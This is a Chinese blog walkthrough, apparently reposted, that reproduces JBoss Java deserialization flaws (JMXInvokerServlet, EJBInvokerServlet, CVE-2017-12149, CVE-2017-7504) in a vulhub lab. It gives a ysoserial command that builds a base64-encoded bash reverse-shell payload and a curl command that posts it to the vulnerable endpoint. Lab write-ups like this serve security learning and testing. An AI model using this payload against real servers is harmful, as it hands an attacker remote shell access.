ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

中间件漏洞 -- JBoss

2021-11-17 23:00:02  阅读:357  来源: 互联网

标签:-- ysoserial 中间件 JMXInvokerServlet JBoss 漏洞 invoker 序列化


中间件漏洞记录--5

        jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
默认端口:8080,9990

目录

一、JBoss JMXInvokerServlet 反序列化漏洞

1、环境搭建:docker + vulhub

2、访问,搭建成功

3、 访问 /invoker/JMXInvokerServlet

4、本来想用工具,结果一堆乱码,看不懂

5、配置安装ysoserial

6、开始攻击

1> base64加密

2> 生成exp.ser

3> 使用POST将其传过去

4> 提前监听,getshell

二、 JBoss EJBInvokerServlet 反序列化漏洞 

三、JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

 四、JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)


一、JBoss JMXInvokerServlet 反序列化漏洞

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

1、环境搭建:docker + vulhub

cd vulhub/jboss/JMXInvokerServlet-deserialization
docker-compose up -d

2、访问,搭建成功

3、 访问 /invoker/JMXInvokerServlet

 返回如下,说明接口开放,此接口存在反序列化漏洞。

4、本来想用工具,结果一堆乱码,看不懂

5、配置安装ysoserial

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests

在执行最后一步时,如果出现bash: mvn: command not found的问题,是因为kali未安装maven时出错的话,参考下面这个

kali安装maven和jdk、解决:bash: mvn: command not found_召唤大白的博客-CSDN博客

安装了五个小时,总算是成功了

6、开始攻击

1> base64加密

2> 生成exp.ser

看好路径

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyOS4yMjUvNjY2NiAwPiYx}|{base64,-d}|{bash,-i} " >exp.ser

3> 使用POST将其传过去

curl http://192.168.129.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

4> 提前监听,getshell

二、 JBoss EJBInvokerServlet 反序列化漏洞 

访问 /invoker/EJBInvokerServlet

返回如下,说明接口开放,此接口存在反序列化漏洞

复现同上 

三、JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

        该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

访问 /invoker/readonly

该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:

复现就同上,都是经典的java反序列化操作 

 

 四、JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,我们借助ysoserial,同一。

标签:--,ysoserial,中间件,JMXInvokerServlet,JBoss,漏洞,invoker,序列化
来源: https://blog.csdn.net/weixin_44769042/article/details/121378799

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有